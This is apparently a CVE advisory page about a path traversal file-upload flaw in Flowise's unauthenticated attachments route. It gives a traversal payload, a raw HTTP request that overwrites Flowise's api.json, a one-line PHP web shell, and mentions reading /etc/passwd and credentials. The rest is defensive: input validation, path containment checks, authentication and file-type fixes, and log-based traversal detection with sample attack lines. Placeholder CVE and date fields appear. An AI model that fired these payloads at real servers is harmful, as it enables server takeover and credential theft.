Flowise, Arbitrary File Upload, CVE-2023-XXXX (Critical)

How the CVE Works:

The vulnerability arises in Flowise because the `/api/v1/attachments` route, which is on the authentication whitelist and is therefore reachable without credentials, does not validate user-supplied input. When a file upload request is made, the server builds the storage path from the `chatflowId` and `chatId` parameters of the request. Neither parameter is checked for path separators or `..` segments, so an attacker can perform path traversal and write the uploaded file to any directory the Flowise process can write to. For example, setting `chatId` to `../../../../../../root/.flowise/` and uploading a file named `api.json` overwrites Flowise's own `api.json` (the file in which Flowise stores its API keys) with attacker-chosen content. Because the destination path is fully attacker-controlled, the same primitive can plant or replace other files, leading to remote code execution, server takeover, or data theft.

DailyCVE Form:

Platform: Flowise
Version: v1.0.0
Vulnerability: Arbitrary File Upload
Severity: Critical
Date: 2023-10-XX

What Undercode Say:

Exploitation:

1. Path Traversal Payload:

Use `chatId=../../../../../../root/.flowise/` to traverse out of the storage directory and overwrite Flowise files such as `api.json`. Note that most HTTP clients normalize `..` segments in the request line before sending, so the request must be sent with a tool that transmits the path exactly as written.

Example HTTP Request:

POST /api/v1/attachments/test/../../../../../../root/.flowise/ HTTP/1.1
Host: target.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="files"; filename="api.json"
Content-Type: application/json

{"key": "malicious_value"}
------WebKitFormBoundary7MA4YWxkTrZu0gW--

2. Remote Code Execution:

Upload a malicious script (e.g., shell.php) to a web-accessible directory and execute it. Flowise itself is a Node.js application, so a PHP web shell only executes if the host also serves that directory through a PHP-enabled web server; otherwise the attacker targets files the Node process loads or executes instead.

Example Payload (the `cmd` query-parameter name is illustrative):

<?php system($_GET['cmd']); ?>

3. Data Theft:

The upload primitive only writes files; it does not read them. Once code execution is obtained via step 2, read sensitive files such as `/etc/passwd` or database credentials, or overwrite credential files with attacker-known values.

Protection:

1. Input Validation:

Validate `chatflowId` and `chatId` to ensure they are UUIDs (or, at minimum, alphanumeric strings with no path separators or dots) before they are used to build a filesystem path.

Example Code:

// Accepts only the canonical 8-4-4-4-12 hex UUID form; anything with "/", "\" or "." is rejected.
const isValidUUID = (id: string) => /^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/i.test(id);
if (!isValidUUID(chatflowId) || !isValidUUID(chatId)) {
throw new Error('Invalid chatflowId or chatId');
}

2. Sanitize File Paths:

Use Node's `path.resolve` to normalize the final path, then verify that the resolved path is contained in the storage root. A plain `startsWith(root)` check is not enough on its own, because it also accepts a sibling directory whose name merely begins with the root (e.g. `/data/storage-evil` for root `/data/storage`); compare against the root plus a trailing separator.

Example Code:

import path from 'path';

const root = path.resolve(getStoragePath());
const safePath = path.resolve(root, ...paths);
// Require the file to be strictly inside the root, not the root itself or a look-alike sibling.
if (!safePath.startsWith(root + path.sep)) {
throw new Error('Invalid path');
}
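The following is an added example, not Flowise's own code, that ties together the exploitation payload above and protection items 1 and 2: it reproduces the vulnerable path construction (request parameters joined straight onto the storage root), shows where the advisory-style payload lands, and then applies UUID validation plus a containment check based on `path.relative`. The storage root `/srv/flowise/storage`, the function names, and the sample UUIDs are assumptions for illustration; Flowise's real `getStoragePath()` is only imitated here.

```typescript
// Added example (not Flowise code). Assumes a POSIX filesystem and the
// hypothetical storage root below, standing in for Flowise's getStoragePath().
import * as path from 'path';

const STORAGE_ROOT = path.resolve('/srv/flowise/storage');

// Vulnerable shape: chatflowId and chatId are joined as-is, so a chatId that
// contains ".." segments walks out of the storage root. Returned path for the
// advisory payload is /root/.flowise/api.json.
function unsafeUploadPath(chatflowId: string, chatId: string, fileName: string): string {
  return path.join(STORAGE_ROOT, chatflowId, chatId, fileName);
}

// Fix 1: only canonical UUIDs may reach the filesystem layer. Any "/", "\" or "."
// fails this test, which kills traversal before a path is even built.
const UUID_RE = /^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/i;
function isValidUUID(id: string): boolean {
  return UUID_RE.test(id);
}

// Weak containment check, kept only to demonstrate its bypass: a sibling directory
// such as /srv/flowise/storage-evil passes because the string prefix matches.
function naiveStartsWithCheck(root: string, candidate: string): boolean {
  return path.resolve(candidate).startsWith(root);
}

// Fix 2: resolve the candidate and prove it is strictly inside root. path.relative()
// yields ".." prefixes (or an absolute path on Windows) for anything outside.
function isInsideRoot(root: string, candidate: string): boolean {
  const rel = path.relative(root, path.resolve(candidate));
  return rel !== '' && !rel.startsWith('..') && !path.isAbsolute(rel);
}

// Hardened path builder: validate identifiers, drop any directory part the client
// put in the filename, then verify containment as defence in depth.
function safeUploadPath(chatflowId: string, chatId: string, fileName: string): string {
  if (!isValidUUID(chatflowId) || !isValidUUID(chatId)) {
    throw new Error('Invalid chatflowId or chatId');
  }
  const base = path.basename(fileName); // "../api.json" -> "api.json"
  const full = path.resolve(STORAGE_ROOT, chatflowId, chatId, base);
  if (!isInsideRoot(STORAGE_ROOT, full)) {
    throw new Error('Invalid path');
  }
  return full;
}

// Stand-alone demonstration with the advisory payload and a sample legitimate request.
const PAYLOAD_CHAT_ID = '../../../../../../root/.flowise/';
const SAMPLE_CHATFLOW_ID = '123e4567-e89b-42d3-a456-426614174000'; // constructed sample
const SAMPLE_CHAT_ID = '9b2e4c8a-1f3d-4e5a-8b6c-7d8e9f0a1b2c';     // constructed sample

console.log('vulnerable:', unsafeUploadPath('test', PAYLOAD_CHAT_ID, 'api.json'));
console.log('naive check accepts sibling dir:', naiveStartsWithCheck(STORAGE_ROOT, '/srv/flowise/storage-evil/x'));
console.log('hardened:', safeUploadPath(SAMPLE_CHATFLOW_ID, SAMPLE_CHAT_ID, '../api.json'));
try {
  safeUploadPath('test', PAYLOAD_CHAT_ID, 'api.json');
} catch (err) {
  console.log('hardened rejects payload:', (err as Error).message);
}
```

The two fixes are complementary: UUID validation stops the bug at the input boundary, while the containment check protects against any future code path that builds a storage path from something other than these two parameters.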

3. Authentication:

Remove `/api/v1/attachments` from the whitelist and enforce authentication for all routes.

Example Code:

export const WHITELIST_URLS = [
'/api/v1/verify/apikey/',
// Remove '/api/v1/attachments'
];

4. File Type Restriction:

Restrict uploaded files to specific MIME types and extensions. Check both, since the client controls the declared MIME type and the filename.

Example Code (the allow-lists are illustrative; tailor them to what the chatflow actually needs):

const allowedMimeTypes = ['image/png', 'image/jpeg', 'application/pdf', 'text/plain'];
const allowedExtensions = ['.png', '.jpg', '.jpeg', '.pdf', '.txt'];
if (!allowedMimeTypes.includes(file.mimetype) || !allowedExtensions.includes(path.extname(file.originalname).toLowerCase())) {
throw new Error('Invalid file type');
}

5. Logging and Monitoring:

Log every upload together with the identifiers used to build its storage path, and alert on requests whose `chatflowId` or `chatId` contains `..`, path separators, or percent-encoded variants of them.

Example Code:

console.log(`File uploaded by ${req.ip}: ${file.originalname} (chatflowId=${chatflowId}, chatId=${chatId})`);
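Logging is only useful if something reads the logs, so the following added example (not part of the original page or of Flowise) shows detection logic that scans access-log lines for upload requests to `/api/v1/attachments` whose identifier segments contain traversal, including percent-encoded and double-encoded forms, or are simply not UUIDs. The log lines are constructed for illustration in combined-log format; the route shape `/api/v1/attachments/<chatflowId>/<chatId>` is taken from the advisory request above.

```typescript
// Added example (not Flowise code): detect traversal attempts against the
// attachments upload route in access logs. SAMPLE_LOG is constructed test data.
interface AccessLogEntry { ip: string; method: string; path: string; status: number; }
interface UploadAlert { ip: string; path: string; reason: string; }

const SAMPLE_LOG: string[] = [
  '203.0.113.7 - - [10/Oct/2023:12:00:01 +0000] "POST /api/v1/attachments/test/../../../../../../root/.flowise/ HTTP/1.1" 200 17',
  '203.0.113.7 - - [10/Oct/2023:12:00:05 +0000] "POST /api/v1/attachments/test/%252e%252e%252f%252e%252e%252froot%252f.flowise%252f HTTP/1.1" 200 17',
  '198.51.100.9 - - [10/Oct/2023:12:01:00 +0000] "POST /api/v1/attachments/123e4567-e89b-42d3-a456-426614174000/9b2e4c8a-1f3d-4e5a-8b6c-7d8e9f0a1b2c HTTP/1.1" 200 17',
  '198.51.100.9 - - [10/Oct/2023:12:01:30 +0000] "GET /api/v1/chatflows HTTP/1.1" 200 512',
];

// Minimal combined-log parser: client IP, method, request path, status.
const ACCESS_LOG_RE = /^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})/;
function parseLogLine(line: string): AccessLogEntry | null {
  const m = ACCESS_LOG_RE.exec(line);
  if (!m) return null;
  return { ip: m[1], method: m[2], path: m[3], status: Number(m[4]) };
}

// Decode percent-encoding until the string stops changing, so %2e%2e and the
// double-encoded %252e%252e both normalize to "..". Malformed encodings are kept as-is.
function fullyDecode(p: string, maxRounds: number = 3): string {
  let cur = p;
  for (let i = 0; i < maxRounds; i++) {
    let next: string;
    try { next = decodeURIComponent(cur); } catch { return cur; }
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

const UUID_RE = /^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/i;

// Returns a reason string when the request is a suspicious upload, else null.
function classifyUpload(entry: AccessLogEntry): string | null {
  if (entry.method !== 'POST') return null;
  const rawPath = entry.path.split('?')[0];
  // Treat backslashes as separators too, then split into segments.
  const decoded = fullyDecode(rawPath).replace(/\\/g, '/');
  const segments = decoded.split('/').filter((s) => s.length > 0);
  if (segments[0] !== 'api' || segments[1] !== 'v1' || segments[2] !== 'attachments') return null;
  if (segments.some((s) => s === '..')) return 'path traversal in chatflowId/chatId';
  const ids = segments.slice(3);
  if (ids.length !== 2 || !ids.every((s) => UUID_RE.test(s))) return 'non-UUID chatflowId/chatId';
  return null;
}

function findTraversalAttempts(lines: string[]): UploadAlert[] {
  const hits: UploadAlert[] = [];
  for (const line of lines) {
    const entry = parseLogLine(line);
    if (!entry) continue;
    const reason = classifyUpload(entry);
    if (reason) hits.push({ ip: entry.ip, path: entry.path, reason });
  }
  return hits;
}

for (const alert of findTraversalAttempts(SAMPLE_LOG)) {
  console.log(`ALERT ${alert.ip} ${alert.reason}: ${alert.path}`);
}
```

Matching on the decoded, segment-split path rather than on the literal substring `../` is what catches the encoded variants; the non-UUID rule additionally flags probing that has not yet reached a traversal payload.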

6. Patch Update:

Update Flowise to the latest version if a patch is released.

Commands:

  • Check for Vulnerable Versions:
    npm list flowise
    
  • Apply Patches:
    npm update flowise
    

By following these steps, you can mitigate the risk of this critical vulnerability and protect your systems from exploitation.

References:

Reported By: https://github.com/advisories/GHSA-h42x-xx2q-6v6g